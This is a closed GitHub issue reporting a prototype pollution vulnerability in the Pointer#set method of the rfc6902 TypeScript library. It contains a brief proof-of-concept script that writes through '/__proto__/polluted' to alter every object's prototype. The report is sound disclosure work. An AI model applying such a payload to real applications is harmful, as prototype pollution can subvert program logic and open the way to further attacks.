Pointer#set is vulnerable to Prototype Pollution

chbrown / rfc6902

Complete implementation of RFC6902 in TypeScript

https://chbrown.github.io/rfc6902/

316 stars 39 forks source link

Pointer#set is vulnerable to Prototype Pollution #95

Closed dalle closed 9 months ago

dalle commented 10 months ago

Prototype Pollution is possible in Pointer#set

See #76

// poc.js
var rfc6902 = require("rfc6902")
var obj = {}
console.log("Before : " + {}.polluted);
Pointer.fromJSON("/__proto__/polluted").set(obj, "Yes! Its Polluted");
console.log("After : " + {}.polluted);